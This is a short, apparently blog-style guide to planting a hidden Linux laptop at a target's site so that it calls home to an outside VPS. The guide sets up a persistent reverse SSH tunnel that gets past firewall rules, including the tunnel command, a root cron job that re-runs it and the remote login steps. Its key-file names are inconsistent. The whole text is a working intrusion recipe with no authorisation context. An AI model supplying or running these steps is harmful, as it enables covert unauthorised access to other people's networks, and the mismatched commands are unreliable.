The point should be obvious. Deploy a stealthy box/laptop (linux based toaster?) at a target’s site. Have it call home on a ubiquitous/innocuous port, bypassing any firewall rules and voila you are inside the candy shell.

Install Linux (depending on situation you might want FDE)
install security tools (nmap, build-essential, nc, etc)

vi /etc/default/acpi-support
Disable sleep in BIOS

ssh-keygen -t rsa (on laptop)

scp ~/.ssh/id_rsa.pub MYVPS:~

cat id_dsa.pub >> .ssh/authorized_keys

NOTE that the usernames must match on local and remote system

/usr/bin/ssh root@MYVPS -R *:222:localhost:22 -N -q -o ‘BatchMode yes’ -o ‘ExitOnForwardFailure yes’

Add to roots crontab
crontab -e */10 * * * * /scripts/callhome

Now ssh to your VPS box and then ssh localhost -p 222, you’re now authenticating to your callback box.